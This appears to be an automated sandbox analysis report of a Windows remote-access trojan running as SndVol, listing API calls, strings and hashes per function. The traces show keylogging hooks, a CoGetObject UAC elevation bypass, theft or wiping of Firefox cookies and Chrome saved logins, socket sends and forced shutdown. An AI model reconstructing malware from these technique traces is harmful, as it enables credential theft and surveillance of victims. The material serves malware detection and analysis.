                                                                • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                                APIs
                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                                • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                                • CloseHandle.KERNEL32(?), ref: 00413465
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                • String ID:
                                                                • API String ID: 297527592-0
                                                                • Opcode ID: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
                                                                • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                                • Opcode Fuzzy Hash: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
                                                                • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0$1$2$3$4$5$6$7
                                                                • API String ID: 0-3177665633
                                                                • Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                                • Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 00407521
                                                                • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Object_wcslen
                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                • API String ID: 240030777-3166923314
                                                                • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                                • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                                APIs
                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                                • GetLastError.KERNEL32 ref: 0041A7BB
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                • String ID:
                                                                • API String ID: 3587775597-0
                                                                • Opcode ID: b5cb2cce8405c774e90894dca81b601ecff233847bd43264dc3cebac0f8f2ebe
                                                                • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                                • Opcode Fuzzy Hash: b5cb2cce8405c774e90894dca81b601ecff233847bd43264dc3cebac0f8f2ebe
                                                                • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                                APIs
                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0536B42B
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0536B47A
                                                                • GetLastError.KERNEL32 ref: 0536B488
                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0536B4C0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                • String ID:
                                                                • API String ID: 3587775597-0
                                                                • Opcode ID: 9206af50c139a4972f8ad6fd42bba56160b21ad091b1fa9e470d4b003cbebb8b
                                                                • Instruction ID: ab30d53e5e4b2891333cdce119a5be8329bc19170958ce92690f793875406432
                                                                • Opcode Fuzzy Hash: 9206af50c139a4972f8ad6fd42bba56160b21ad091b1fa9e470d4b003cbebb8b
                                                                • Instruction Fuzzy Hash: 3C814071208305AFC714EF20DC98EAFB7A8BF94764F50592DF98253150EE74EA45CB62
                                                                APIs
                                                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                                • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                • String ID: lJD$lJD$lJD
                                                                • API String ID: 745075371-479184356
                                                                • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                                • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                                • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                                • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                • API String ID: 1164774033-405221262
                                                                • Opcode ID: 4df2a84653b9998b7d2611416e9b7e0e9783126b4176f23e9f3b784d6a9020ad
                                                                • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                                • Opcode Fuzzy Hash: 4df2a84653b9998b7d2611416e9b7e0e9783126b4176f23e9f3b784d6a9020ad
                                                                • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                                • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                • String ID:
                                                                • API String ID: 2341273852-0
                                                                • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                                • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 0536AA18
                                                                  • Part of subcall function 0536D152: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,05354DFC,00465E74), ref: 0536D16B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CreateFindFirst
                                                                • String ID: (eF$8SG$PXG$PXG$NG$PG
                                                                • API String ID: 41799849-875132146
                                                                • Opcode ID: bbe42075c7ae05260fcfbdefb5d4915f8db24fce95c41e285dba89f894bfd920
                                                                • Instruction ID: 382a4db048d258999e6790d33ddd35f64c05b75124e50935d8ad9b61b3fcbecc
                                                                • Opcode Fuzzy Hash: bbe42075c7ae05260fcfbdefb5d4915f8db24fce95c41e285dba89f894bfd920
                                                                • Instruction Fuzzy Hash: 818182757042409BD718FB30DC58EEF73A9AFA0260F50992DFC96571E4EF309A49C652
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                                • GetLastError.KERNEL32 ref: 0040A2ED
                                                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                                                • TranslateMessage.USER32(?), ref: 0040A34A
                                                                • DispatchMessageA.USER32(?), ref: 0040A355
                                                                Strings
                                                                • Keylogger initialization failure: error , xrefs: 0040A301
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                • String ID: Keylogger initialization failure: error
                                                                • API String ID: 3219506041-952744263
                                                                • Opcode ID: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
                                                                • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                                • Opcode Fuzzy Hash: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
                                                                • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                                APIs
                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00466A84), ref: 0535C87C
                                                                • FindClose.KERNEL32(00000000), ref: 0535C896
                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0535C9B9
                                                                • FindClose.KERNEL32(00000000), ref: 0535C9DF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$CloseFile$FirstNext
                                                                • String ID:
                                                                • API String ID: 1164774033-0
                                                                • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                                                • Instruction ID: a68530f6c06bab7312fc95f7486cc559b13b8016e88a2b76cafb70aeeb9ce43b
                                                                • Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                                                • Instruction Fuzzy Hash: 32518131A0421DABDB14F7B0DC5DEEE7778BF11264F10216AFC0666091FF706A49CA55
                                                                APIs
                                                                • GetForegroundWindow.USER32 ref: 0040A416
                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                • GetKeyState.USER32(00000010), ref: 0040A433
                                                                • GetKeyboardState.USER32(?), ref: 0040A43E
                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                • String ID:
                                                                • API String ID: 1888522110-0
                                                                • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                                • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                                APIs
                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                • API String ID: 2127411465-314212984
                                                                • Opcode ID: 4793322b27984231f79bc6c38662749e635957783f1b56b8fa652e3949e54a9b
                                                                • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                                • Opcode Fuzzy Hash: 4793322b27984231f79bc6c38662749e635957783f1b56b8fa652e3949e54a9b
                                                                • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                                APIs
                                                                • _free.LIBCMT ref: 00449212
                                                                • _free.LIBCMT ref: 00449236
                                                                • _free.LIBCMT ref: 004493BD
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                • _free.LIBCMT ref: 00449589
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                • String ID:
                                                                • API String ID: 314583886-0
                                                                • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                                                • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                                • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                                                • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 053594DE
                                                                • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 05359597
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 053595BF
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 053595CC
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 053596E2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                • String ID: hdF
                                                                • API String ID: 1771804793-665520524
                                                                • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                                                • Instruction ID: 51adf9f6ed7051d35314a67fa0d2f2f3cc998ba89b49380f7f3146edc921d2a6
                                                                • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                                                • Instruction Fuzzy Hash: EB515377A00109AACF04FFA4DD59EEE7779BF10220F516569BC06A7090EF349B49CB91
                                                                APIs
                                                                  • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                  • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                  • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                  • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                  • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                • API String ID: 1589313981-2876530381
                                                                • Opcode ID: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                                • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                                • Opcode Fuzzy Hash: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                                • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                                • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                                • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP$['E
                                                                • API String ID: 2299586839-2532616801
                                                                • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                                • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                                APIs
                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                                • GetLastError.KERNEL32 ref: 0040BA58
                                                                Strings
                                                                • UserProfile, xrefs: 0040BA1E
                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                                • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DeleteErrorFileLast
                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                • API String ID: 2018770650-1062637481
                                                                • Opcode ID: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                                • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                                • Opcode Fuzzy Hash: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                                • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                • GetLastError.KERNEL32 ref: 0041799D
                                                                Strings
                                                                Memory Dump Source
